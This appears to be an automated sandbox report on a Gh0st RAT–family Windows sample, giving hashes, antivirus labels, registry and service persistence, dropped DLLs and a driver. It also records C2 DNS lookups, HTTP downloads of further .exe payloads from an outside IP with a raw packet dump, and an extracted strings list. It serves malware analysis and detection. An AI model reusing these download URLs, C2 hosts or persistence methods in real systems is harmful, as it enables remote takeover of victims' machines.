Field | Value |
---|---|
Analysis Date | 2015-02-22 18:00:19 |
MD5 | 41ddfa1c6527d4471b12bbe1b94f9b52 |
SHA1 | bdc45af2da5a8363dae790499ec9c21c5dea1be8 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 1da0f04d754bc9bc60fd62a611662088 sha1: 35c4e152f19e418b19a28cace15516fba0c6e44e size: 6144 | |
Section | .rsrc md5: feec81e768b70b1326b9aa3a248074aa sha1: a8c7180a618b34e3765a50df3f06807084ed5d26 size: 116736 | |
Section | .tc md5: 6eca814a49771af43d45eaba37702ea5 sha1: da0b2544a8dd9f8a0b07617189e080b949898a89 size: 76288 | |
Timestamp | 2011-11-25 12:02:17 | |
PEhash | 11d42609867d277c812eaf0ed5d28319d08a55cf | |
IMPhash | f683366ddf493cd68d5fc61a44ca3135 | |
AV | 360 Safe | Virus.Win32.Agent.O |
AV | Ad-Aware | Win32.Viking.AR |
AV | Alwil (avast) | OnLineGames-GJV [Trj]:Viking-CF:Win32:Viking-CF |
AV | Arcabit (arcavir) | Win32.Viking.AR:Trojan.Redosdru.Gen.1 |
AV | Authentium | W32/Viking.A.gen!Eldorado |
AV | Avira (antivir) | W32/Fujacks.DR |
AV | BullGuard | Win32.Viking.AR |
AV | CA (E-Trust Ino) | Win32/Zegost.B!generic |
AV | CAT (quickheal) | W32.Agent.DP |
AV | ClamAV | Worm.Fujack-55 |
AV | Dr. Web | Trojan.DownLoader9.7320 |
AV | Emsisoft | Win32.Viking.AR |
AV | Eset (nod32) | Win32/Agent.DP virus |
AV | Fortinet | W32/Torr.BH!tr.bdr |
AV | Frisk (f-prot) | W32/Viking.A.gen!Eldorado |
AV | F-Secure | Win32.Viking.AR |
AV | Grisoft (avg) | BackDoor.Generic_r.ZL |
AV | Ikarus | P2P-Worm.Win32.Palevo |
AV | K7 | Virus ( 00108a531 ) |
AV | Kaspersky | Virus.Win32.Agent.dp |
AV | MalwareBytes | Trojan.ServStart |
AV | Mcafee | Error Scanning File |
AV | Microsoft Security Essentials | Virus:Win32/Viking.NK |
AV | MicroWorld (escan) | Win32.Viking.AR |
AV | Rising | Win32.Agent.hn |
AV | Sophos | W32/FuzVir-A |
AV | Symantec | W32.Loorp.A!inf |
AV | Trend Micro | PE_JEEFO.D |
AV | VirusBlokAda (vba32) | Virus.Win32.Koklek |
Runtime Details:
Process
↳ C:\malware.exe
Action | Detail |
---|---|
Registry | HKEY_LOCAL_MACHINE\software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST\netsvcs ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Parameters\ServiceDll ➝ C:\WINDOWS\system32\hackeyes.dll\\x00 |
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Description ➝ \\xbc\\xe0\\xb2\\xe2\\xba\\xcd\\xbc\\xe0\\xca\\xd3\\xd0\\xc2\\xd3\\xb2\\xbc\\xfe\\xc9\\xe8\\xb1\\xb8\\xb2\\xa2\\xd7\\xd4\\xb6\\xaf\\xb8\\xfc\\xd0\\xc2\\xc9\\xe8\\xb1\\xb8\\xc7\\xfd\\xb6\\xaf\\x00 |
Creates File | C:\WINDOWS\system32\hackeyes.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Service | Microsoft Device Manager - %SystemRoot%\System32\svchost.exe -k netsvcs |
Starts Service | MDM Serverice |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Action | Detail |
---|---|
Creates File | C:\WINDOWS\system32\dllcache\lsasvc.dll |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Action | Detail |
---|---|
Creates File | PIPE\SfcApi |
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\qmgr.dll |
Creates File | C:\WINDOWS\system32\mspmsnsv.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat" |
Starts Service | WmdmPmSN |
Process
↳ Pid 828
Process
↳ Pid 872
Process
↳ C:\WINDOWS\System32\svchost.exe
Action | Detail |
---|---|
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WZCV4JYN\desktop.ini |
Creates File | NtHid |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KEGVIQDV\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | PIPE\lsarpc |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KKZF8Z9O\desktop.ini |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\TEMP\NtHid.sys |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0PQRSTU7\desktop.ini |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\WINDOWS\TEMP\NtHid.sys |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Creates Mutex | c:!documents and settings!networkservice!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!networkservice!cookies! |
Creates Mutex | c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! |
Creates Service | NtHid - C:\WINDOWS\TEMP\NtHid.sys |
Winsock DNS | 204.11.56.45 |
Winsock DNS | www.490a-B8B5-9B8C1E870B0C.com |
Winsock DNS | www.baidu.com |
Winsock DNS | pc1.114central.com |
Process
↳ Pid 1132
Process
↳ Pid 1228
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Process
↳ Pid 1892
Process
↳ Pid 1216
Process
↳ C:\WINDOWS\System32\svchost.exe
Action | Detail |
---|---|
Registry | HKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Type ➝ 288 |
Creates File | pipe\net\NtControlPipe10 |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates Mutex | AAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8= |
Network Details:
Type | Detail |
---|---|
DNS | luo2374041234.f3322.org Type: A 219.235.4.118 |
DNS | www.a.shifen.com Type: A 180.76.3.151 |
DNS | pc1.114central.com Type: A 204.11.56.45 |
DNS | nbtj.114anhui.com Type: A |
DNS | www.baidu.com Type: A |
DNS | www.490a-B8B5-9B8C1E870B0C.com Type: A |
HTTP GET | http://204.11.56.45/ko/01.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://204.11.56.45/ko/02.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://204.11.56.45/ko/03.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
Flows TCP | 192.168.1.1:1031 ➝ 219.235.4.118:8086 |
Flows TCP | 192.168.1.1:1033 ➝ 204.11.56.45:80 |
Flows TCP | 192.168.1.1:1034 ➝ 219.235.4.118:8086 |
Flows TCP | 192.168.1.1:1035 ➝ 204.11.56.45:80 |
Flows TCP | 192.168.1.1:1036 ➝ 204.11.56.45:80 |
Raw Pcap
```text
0x00000000 (00000) 47683073 74e8                       Gh0st.

0x00000000 (00000) 47455420 2f6b6f2f 30312e65 78652048 GET /ko/01.exe H
0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept:
0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent
0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c
0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE
0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT
0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C
0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H
0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4
0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K
0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive.......
0x000000b0 (00176) eb626c69 6ce8c240 0c38cec6 c070e8f6 .blil..@.8...p..
0x000000c0 (00192) 99cd1b9e 319483f8 bd407c03 683603d0 ....1....@|.h6..
0x000000d0 (00208) 7d21b108 3bfe03c1 913527ce 6fbf76fd }!..;....5'.o.v.
0x000000e0 (00224) 252eb3                              %..

0x00000000 (00000) 47683073 74e7                       Gh0st.

0x00000000 (00000) 47455420 2f6b6f2f 30322e65 78652048 GET /ko/02.exe H
0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept:
0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent
0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c
0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE
0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT
0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C
0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H
0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4
0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K
0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive.......
0x000000b0 (00176) eb626c69 6ce8c240 0c10                .blil..@..

0x00000000 (00000) 47455420 2f6b6f2f 30332e65 78652048 GET /ko/03.exe H
0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept:
0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent
0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c
0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE
0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT
0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C
0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H
0x00000080 (00128) 6f73743a 20323034 2e31312e 35362e34 ost: 204.11.56.4
0x00000090 (00144) 350d0a43 6f6e6e65 6374696f 6e3a204b 5..Connection: K
0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0aeee9a7 eep-Alive.......
0x000000b0 (00176) eb626c69 6ce8c240 0c10                .blil..@..
```
Strings
y z Gh0s E.P \ghh ijpp . wilg.x [ {| stu v . f .}~ wx . .. .O... 080404b0 3, 6, 0, 0 \A\..\..\ Comments CompanyName Copyright ? 2008 \Device\NtHid Device Protect Application \Driver\Tcpip FILE FileDescription FileVersion InternalName IoDriverObjectType @jjj jjjj jjjjh jjjjj jjjjjjjjh LegalCopyright LegalTrademarks Microsoft Corporation Microsoft(R) Windows(R) Operating System \??\NtHid ObReferenceObjectByName OriginalFilename PrivateBuild ProductName ProductVersion PsLookupProcessByProcessId SpecialBuild StringFileInfo svchost.dll Translation VarFileInfo VS_VERSION_INFO ~0;~,} ?$?(?,?0? 0 0$0(0,0004080 0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0 0%0/0@0E0R0f0 0!0.0C0M0W0 0&0;0G0M0o0 0+020e0k0 0050Q0 0 060;0j0 0(090?0F0M0d0 0,0A0^0s0 0:0J0d0y0 00p0t0 0 1!1'181S1h1o1 0!1*1=1M1V1y1 0&1,181L1 0#161f1t1x1|1 [%02d/%02d/%d %02d:%02d:%02d] (%s) ; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X; +0G0x0 0j/0@0E0R0f0 :#:0:K:[:`:i:t: 0p2t2x2|2 0T0X0\0`0d0h0l0p0t0x0| ;+;0;?;\;w; :&:0:>:W: 1$1*10161<1B1H1N1T1Z1`1f1l1r1x1~1 1$111:1G1P1]1 1(1/1o1w1 1*1<1Z1l1 1)181B1P1m1|1 1"1B1U1i1t1 1.1E1K1Z1h1 1!1F1m1 1$1g1t1 1@1P1^1 1.1S1[1`1m1 127.0.0.1 localhost 191I1U1 1b2w2}2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ;1<=<B<J< ="='=,=1=>=F= 1=>=F= :1G1P1]1 1K1Z1h1 1l1.dll ??1type_info@@UAE@XZ ?%?2???]? ?%?2?]? 207C6A67-5861-4aaf-A336-C255C7AE4C57 2+222=2 2,22282>2D2J2O2U2b2h2n2t2 2%292D2 2(2B2N2W2c2l2x2 2(2B2N2W2c2n 2<2Q2W2h2p2 2<2Q{h2p2 2&3F3N3`3k3 2?3H3Q 2?3H3Q3 %-24s %-15s %-24s %-15s 0x%x(%d) %-24s %-15s %s 2D2J2O2U2b1n2t2 >)>2>E>S>\>s> >2>E>S>\>s> 2K2f2v2 :2;O;W;\;c;i;o;u;|; 2T2d2{2 2Y2w2}2 ??2@YAPAXI@Z 313Q3V3_3o3x3 #32770 3!303?3 3$30363X3j3 3$30l3Xk 3!313W3w3 3 3(313;3^3 3&3+333@3T3e3 3)33393\3h3y3 3#3+3t3}3 3*353@3M3T3c3 3#3W3b3 343=3B3j3p3|3 3(4]4c4 3=4f4k4 353Q3}3 \360ACC.dat \360ACC.log \\.\360SpShadow0 360tray.exe *37}CC ;3D;H;L ? ?*?3???D?N?W?a?o?y? 
;3<;<N< 3r4x4~4 @3T3e3 ??3@YAXPAX@Z <)=3===Z=a=y= {4_^]3 4&414]4 4$4-444A4J4Y4_4 4)4?4^4e4 44494A4 4%4+4G4 4%4+4G4z4 4(484<4@4D4H4L4P4T4X4h4l4p4t4x4 4+4B4N4[4b4 4)4I4a4 4#4L4r4 4/5K5V5 49-E88E-4c47-98DC :!:,:4:C:v: :,:4:@:\:d:p: =,=4=@=\=h= ; <4<@<H<x< :*:4:P:q: 4Q5e5x 4Q5e5x5 4R4Y4l4y4 5(51585 5$5)565K5b5t5 5#575?5N5 5!6&6/6 )56Ab5t5 5<6d6v6|6 5A5L5_5i5 ;!;+;5;?;C;J; ;!;+;5;?;C;J;P;Z;d;n;x; :5:F:Y:w:|: ;(;5;?;J;T;_;i;z; 5K5Q5a5 5U5h5q5 6$636<6B6M6W6 6 6(626?6H6Q6c6l6 6%6.6:6B6Y6^6i6 6.6:6C6M6W6\6 6'6.6F6K6 6 6<6H6d6p6 6<6]6i6 6)6J6e6v6 6!71767D7R7^7i7p7 696P6Y6~6 :6;B;P;g;x; >!>&>6>G>g>s> 6o7t7x7|7 ;7<><`< 738K8f8 7&727;7J7S7[7v7 7(767<7l7 7#767?7N7T7]7i7s7x7 777>7f7 777E7Q7X7d7l7v7 7:7A7b7v7 7,7L7P7d7p7x7 7'7R7_7 7 8?8N8n8 7{8 9?9p9 7 8S8u8 7&8V8h8 7?;K<?= 7k738w8 7L7Y7h7u7 ?7N7T7] 7.|qCC @.&'85 8,868<8A8K8Q8[8f8r8|8 8-8<8^8 8#8(8-8:8J8 8(8.898E8J8O8[8`8i8o8z8 889_9k9 8(8D8P8l8x8 8=8T8\8b8h8s8x8~8 8*8u8z8 8.8W8n8u8 8 9 9e9l9{9 8"9E9h9 >!>*>8>B>H>V>`> >!>*>8>B>H>V>`>n>t> :8;B;V;`; ;8;C;V;j;u; ;8<<<@<D<H<L<P<d<p< 8E:4;@=D=H=L=P=T=X=\=`=d=h=l=p=t=P?`?j? 
9*:/$: 909D9P9l9t9 9$:-:3:8: 94A7A7DA-6D69-472e-8981-DBC71C77FC66 959S9^9 9&:5:F:Y:w:|: 9*:/:6: @\96DBA2^ 979A9}9 9!91969I9N9^9c9r9w9|9 9 9-9;9A9F9 9 9[9`9g9m9s9~9 999`9i9 9&9/9>9Q9e 9&9/9>9Q9e9o9{9 -9;9A9F9 9A:L:R:W:^:d: 9%:J:`: ~(9~$u 9.:U:p:}: A1O1k2y2%4*4 A4J4Y4_4 AAAAAA AAAAAAA AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ _acmdln AddAccessAllowedAce _adjust_fdiv AdjustTokenPrivileges advapi32.dll Advapi32.dll ADVAPI32.dll agX \s AllocateAndInitializeSid Application \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND AppMgmt appmgmts.dll appmgmts.dlld ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z <AtG<BtC [autorun] AVICAP32.dll avp.exe .?AVtype_info@@ =!>B>d> bdagent.exe _beginthreadex bgTLOkN BitBlt BlockInput browser Browser browser.dll buffer error buffer wrong ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB CallNextHookEx calloc CancelIo cannot be run i capCreateCaptureWindowA capGetDriverDescriptionA C:\dll.pdb C:\exe.pdb CharNextA ClearEventLogA CloseClipboard CloseDesktop CloseEventLog CloseHandle CloseServiceHandle CloseWindow \cmd.exe :C:M:d:m: Common Files ComPlus Applications CONNECT ConnectGroup ConnectNamedPipe _controlfp ControlService ControlSet\Services ConvertSidToStringSidA CopyFileA CP<Z<|< CreateCompatibleBitmap CreateCompatibleDC CreateDIBSection CreateDirectoryA CreateEventA CreateFileA CreateFileMappingA CreateMutexA CreateNamedPipeA CreatePipe CreateProcessA CreateProcessAsUserA CreateRemoteThread CreateServiceA CreateService(Parameters) CreateThread 
CreateToolhelp32Snapshot CreateWindowExA crypt'c CryptSvc cryptsvc.dll C:\sys.pdb CVideoCap __CxxFrameHandler _CxxThrowException D0H0L0PM D$0QhLA D$(8D* D$8RPQ @.data data error D$(cvid %d.%d.%d.%d %d.%d.%d.%d DDDDDD %d%d%d%d%d%d.bak Ddk h$ default Default .DEFAULT\Keyboard Layout\Toggle deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly DeleteCriticalSection DeleteDC DeleteFileA DeleteObject DeleteService Description DestroyCursor Device DeviceIoControl (D/fc_oL D$:f;E =@>D>H>L>P>T>X>\>`>d>h>l>p>t> DialParamsUID DisconnectNamedPipe DispatchMessageA D$ IV32 ;/;d;i;y;~; D$lRPj D$$MP42 dOCUMENTS AND sETTINGS\ Documents and Settings DOS mode. ;';D<P< D$PRPj D$<PVh D$\PWVh D$(RPj D$,RPQ D$$RPU ;D$<s! D$$SUV D$TSUVW =&=,=D=v= &=,=D=v= E8J8O8[8`8i8o8z8 EmptyClipboard empty distance tree with lengths EnableAdminTSRemote Enabled EnterCriticalSection EnumProcessModules EnumWindows ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z eParam$ _errno Error configure es.dll EventSystem ExAllocatePoolWithTag _except_handler3 ExecuUA ExFreePoolWithTag ExitProcess ExitThread ExitWindowsEx ExpandEnvironmentStringsA explorer.exe Explorer.exe EXPLORER.EXE Expor.exe FastUserSwitchingCompatibility fclose fDenyTSConnections Fdf+Fh FhURUPQ file error FindClose FindFirstFileA FindNextFileA FindResourceA FlushFileBuffers FlushViewOfFile freeaddrinfo FreeConsole FreeLibrary FreeResource FreeSid ;F<W<h<"=K=f= fwrite GDI32.dll GD]_[Y GetActiveWindow getaddrinfo GetClipboardData GetCommandLineA GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetCursorInfo GetCursorPos GetDesktopWindow GetDIBits GetDiskFreeSpaceExA GetDriveTypeA GetExitCodeProcess GetExitCodeThread GetFileAttributesA GetFileSize GetFileTime GetInputState GetKeyNameTextA GetLastError GetLengthSid GetLocalTime GetLogicalDrives GetLogicalDriveStringsA __getmainargs GetMessageA GetModuleFileNameA GetModuleFileNameExA GetModuleHandleA GetModuleInformation GetPrivateProfileSectionNamesA 
GetPrivateProfileStringA GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetSystemDirectoryA GetSystemInfo GetSystemMetrics GetSystemTime GetTempPathA GetThreadDesktop GetTickCount GetTokenInformation GetUrlCacheEntryInfoA GetUserObjectInformationA GetVersionExA GetVolumeInformationA GetWindowsDirectoryA GetWindowTextA GetWindowThreadProcessId Gh0st Update Ghost.exe GlobalAlloc GlobalFree GlobalLock GlobalMemoryStatusEx GlobalSize GlobalUnlock Global\UUPP %d ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z >G?S?y? =G>V>v> <H1>403 Forbidden</H1> h1l1.T \hackeyes.dat hackeyes.dll HARDWARE\DESCRIPTION\System\CentralProcessor\0 H.data :(;<;H;d;l;t; HeapAlloc HeapFree helpsvc Hotkey |$HPWS h.rdata HtrHuk http:// HTTP:// HTTP/1.0 200 OK Http/1.1 403 Forbidden HTTPS:// http://%s%s http://%s/%s/%s.exe ICClose ICCompressorFree ICOpen ICSendMessage ICSeqCompressFrame ICSeqCompressFrameEnd ICSeqCompressFrameStart iD&YomH ?=?I?\?h?v? IMM32.dll ImmGetCompositionStringA ImmGetContext ImmReleaseContext incompatible version incomplete distance tree incomplete dynamic bit lengths tree incomplete literal/length tree incorrect data check incorrect header check inflate 1.1.4 Copyright 1995-2002 Mark Adler ingCompatibil InitializeAcl InitializeCriticalSection InitializeSecurityDescriptor _initterm InstallModule InstallShield Installation Information insufficient memory InterlockedExchange Internet InternetCloseHandle Internet Explorer InternetOpenA InternetOpenUrlA InternetReadFile invalid bit length repeat invalid block type invalid distance code invalid literal/length code invalid stored block lengths invalid window size IoCreateDevice IoCreateSymbolicLink IocSymd IoDeleteDevice IoDeleteSymbolicLink IofCompleteRequest IsValidSid IsWindow IsWindowVisible i|tlh` Iu _^[ >>>i>v> _;i;z; |$`j/W ;,<J<Y<d<j<s< -k 4/ _kaspersky kca:\lsa kernel32.dll Kernel32.dll KERNEL32.dll KERNEL32.DLL KeServiceDescriptorTable KEveny keybd_event K:\Q.pdb`q 
?+?>?l? =>>L>[> L$0Phx L$4QRRRRRU L$,91t L$@_^][d LeaveCriticalSection L$$_^]f L$@jdQV L$$j\Q L$L91t L$LQVS LoadCursorA LoadLibraryA LoadLibraryExA LoadResource LocalAlloc LocalFree LocalReAlloc LocalSize LockResource LookupAccountNameA LookupAccountSidA LookupPrivilegeValueA Loopt.bat L$(PQj L$,QWV L$_RasDefaultCredentials#0 L$ RQPj L$ RUPj LsaClose LsaFreeMemory LsaOpenPolicy LsaRetrievePrivateData lstrcatA lstrcmpA lstrcmpiA lstrcpyA lstrcpynA lstrlenA l$(VW3 m1\U\Kcn malloc MapViewOfFile MapVirtualKeyA m ,.CC m ,.CCC M:d:m: MDM Serverice memcpy memmove memset Messenger Microsoft Device Manager microsoft frontpage Microsoft\Network\Connections\pbk\rasphone.pbk MmGetSystemRoutineAddress MmMapLockedPagesSpecifyCache ?M?n?x? mouse_event MoveFileA MoveFileExA Movie Maker Mozilla/4.0 (compatible) MPR.dll MSN Gaming Zone mspmsnsv.dll MSVCP60.dll MSVCRT.dll MSVFW32.dll mswsock.dll MultiByteToWideChar |$$MZu' NDSUPQ need dictionary NETAPI32.dll NetLocalGroupAddMembers Netman netman.dll NetMeeting netsvcs netsvcs_0x%d NetUserAdd ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB NPRPUSj NT\Curr ntdll.dll \\.\NtHid NtHid.sys Ntmssvc ntmssvc.dll ntoskrnl.exe NtQuerySystemInformation ObfDereferenceObject ObReferenceObjectByHandle ObReferenceObjectByPointer oft\Wud OpenClipboard OpenDesktopA OpenEventA OpenEventLogA OpenInputDesktop OpenProcess OpenProcessToken OpenSCManager() OpenSCManagerA OpenServiceA OPEN=%s\%s OpenThread OpenWindowStationA +OpsSCM |otB.8 Outlook Express oversubscribed distance tree oversubscribed dynamic bit lengths tree oversubscribed literal/length tree >">/>p> PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDd Parameters \Parameters PathFileExistsA pchsvc.dll __p__commode PeekNamedPipe >P?e?k? 
__p__fmode PhoneNumber Phvidc \\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A PortNumber PostMessageA PostThreadMessageA PPPPPP PPPPPP%SystemRoot%\system32\hackeyes.dll Process32First Process32Next ProductName Program Files\Internet Explorer\iexplore.exe Program Files\WinRAR\Rar.exe PSAPI.DLL PsGetVersion PsTerminateSystemThread putchar ;<<P<x< <'<=<P<Z<|< P;Z;d;n;x; ;Q;];}; qmgr.dll QQQQQQQ QRPPPPPPVP 'q*#rrssC QSSSSSSSSj QueryServiceStatus RasDialParams!%s#0 `.rdat[ `.rdata ReadFile ReadProcessMemory realloc recycle.{645FF040-5081-101B-9F08-00AA002F954E} RECYCLER ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z REG_BINARY RegCloseKey RegCreateKeyA RegCreateKeyExA RegDeleteKeyA RegDeleteValueA REG_DWORD RegEnumKeyExA RegEnumValueA REG_EXPAND_SZ RegisterServiceCtrlHandlerA \Registry\Machine REG_MULTI_SZ RegOpenKeyA RegOpenKeyExA RegQueryValueA RegQueryValueExA RegQueryValueEx(Svchost\netsvcs) RegQueryValueEx(Type) RegSetValueExA RegSetValueEx(start) regsvc.dll REG_SZ ReleaseDC ReleaseMutex .reloc @.reloc Remote RemoteRegistry RemoveDirectoryA ResetEvent ResumeThread <'=.=R=f= -<RoA%'_h7 RPCRT4.dll RtlInitUnicodeString RtlIoU %s\*.* =;>S>}> S1[1`1m1 %sautorun.inf {schedsvc schedsvc.dll Schedule <script %s%d%d%d%d%d%d %s\desktop.txt %s\dllcache\lsasvc.dll SDPSRV %s\drivers\etc\hosts %s%d%s Security SeDebugPrivilege SelectObject SendMessageA ServiceDll ServiceMain SeShutdownPrivilege __set_app_type SetCapture SetClipboardData SetCursorPos SetEndOfFile SetErrorMode SetEvent SetFileAttributesA SetFilePointer SetFileTime SetLastError SetNamedPipeHandleState SetProcessWindowStation SetRect SetSecurityDescriptorDacl SetServiceStatus SetThreadDesktop SetUnhandledExceptionFilter __setusermatherr SetWindowsHookExA sfc_os.dll sgegpjde11207255ADAAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8= SHDeleteKeyA shell32.dll SHELL32.dll ShellExecuteA shell\explore= shell\explore\Command=%s\%s %s shell\open= shell\open\Command=%s\%s %s shell\open\Default=1 
